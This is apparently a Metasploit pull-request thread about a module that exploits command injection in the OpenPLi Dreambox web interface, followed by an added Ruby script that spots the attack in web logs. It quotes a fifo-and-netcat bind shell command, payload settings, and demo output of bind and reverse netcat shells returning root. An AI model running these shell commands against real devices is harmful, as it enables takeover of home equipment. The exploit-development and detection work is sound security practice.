Openpli #1496
Overriding the payload is not ok.

Could you explain it for me a bit more in detail? Thanks
```ruby
uri = '/cgi-bin/setConfigSettings'

if payl =~ /bind/
  cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
```
Don't do this. You're breaking handlers and bypassing encoders.
The device has a netcat binary installed. This netcat binary does not understand the typical -e switch that is used by the Metasploit payloads. After discussing this issue with Juan offline, it looks like the correct way is to generate a new cmd payload for this module. But for now it is just this one module that will use this payload. @jlee-r7 should we generate a new payload or is there any better way? Best,

Hi m-1-k-3, we just merged #1576. Hopefully the new netcat payloads can be used from the Openpli module and we can close it soon!
```ruby
'Compat' =>
  {
    'PayloadType' => 'cmd',
    'RequiredCmd' => 'netcat-e generic'
```
Hopefully `'RequiredCmd' => 'netcat'` can be used now, after #1576, and embedding payloads in the module code can be avoided.
Please feel free to update it and update us with anything!
```
Exploiting Demo - 192.168.178.105 / 0
exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/bind_netcat_openbsd
[] Started bind handler
uid=0(root) gid=0(root)

Exploiting Demo - 192.168.178.105 / 0
exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/reverse_netcat_openbsd
[] Started reverse handler on 192.168.178.105:4444
uid=0(root) gid=0(root)
```
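From the defender's side, the requests this module sends are easy to spot in the device's web-server logs: a hit on `/cgi-bin/setConfigSettings` whose query carries the fifo-plus-netcat shell command quoted in the review above. The following is an added example, not code from this PR or from Metasploit: it decodes the query string of constructed access-log lines and flags the pattern. The parameter name `cmd` in the sample lines is a placeholder; the actual vulnerable parameter is not named on this page.

```ruby
require 'uri'

# Constructed sample access-log lines (not real device logs). "cmd=" is a
# placeholder parameter name; the first line carries the URL-encoded form of
# the netcat command discussed in the review.
SAMPLE_LOG = <<~LOG
  192.168.178.105 - - [01/Mar/2013:10:00:00 +0100] "GET /cgi-bin/setConfigSettings?cmd=mknod%20%2Ftmp%2Fbackpipe%20p%3B%20nc%20-l%20-p%204444%200%3C%2Ftmp%2Fbackpipe%20%7C%20%2Fbin%2Fsh%201%3E%2Ftmp%2Fbackpipe HTTP/1.1" 200 512
  192.168.178.105 - - [01/Mar/2013:10:00:01 +0100] "GET /cgi-bin/setConfigSettings?timeout=30 HTTP/1.1" 200 512
  192.168.178.22 - - [01/Mar/2013:10:00:02 +0100] "GET /index.html HTTP/1.1" 200 1024
LOG

TARGET_URI = '/cgi-bin/setConfigSettings'
# Shell metacharacters that have no business in a settings request.
SHELL_META = /[;|`&$<>]/
# Fifo-based netcat shell (mknod/mkfifo ... nc ... /bin/sh) or the classic nc -e form.
NETCAT_SHELL = /\b(mknod|mkfifo)\b.*\b(nc|netcat)\b.*\/bin\/sh|\b(nc|netcat)\b\s+-[a-z]*e\b/

# Common-log-format request line: source, timestamp, method, request target.
REQUEST_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/

# Returns one hash per request to TARGET_URI whose decoded query looks like
# command injection, with the reasons it was flagged.
def suspicious_requests(log)
  log.each_line.each_with_object([]) do |line, hits|
    m = REQUEST_RE.match(line) or next
    src, ts, method, target = m.captures
    path, query = target.split('?', 2)
    next unless path == TARGET_URI && query
    decoded = URI.decode_www_form_component(query)
    reasons = []
    reasons << 'shell metacharacters' if decoded =~ SHELL_META
    reasons << 'netcat shell pattern' if decoded =~ NETCAT_SHELL
    next if reasons.empty?
    hits << { src: src, time: ts, method: method, decoded: decoded, reasons: reasons }
  end
end

if __FILE__ == $0
  suspicious_requests(SAMPLE_LOG).each do |h|
    puts "#{h[:time]} #{h[:src]} #{h[:method]} #{h[:reasons].join(', ')}: #{h[:decoded]}"
  end
end
```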
Hi @m-1-k-3, I've done a PR to your repo: m-1-k-3#3. I've done the final module cleanup myself; please feel free to review the changes and ask about any doubts you have, and once you can verify it's working it will be ready to merge. Just land the PR above on your repo and this one will be updated automatically. I've verified the generated HTTP request and it seems okay, but since I don't have a real device to test on, I'll need your help again!

Works very well.

Merged, thanks @m-1-k-3!!
Hey guys,
attached you will find the module for the OpenPLi web vulnerability.
http://www.s3cur1ty.de/m1adv2013-007
Looking forward to your feedback.
Best,
mIke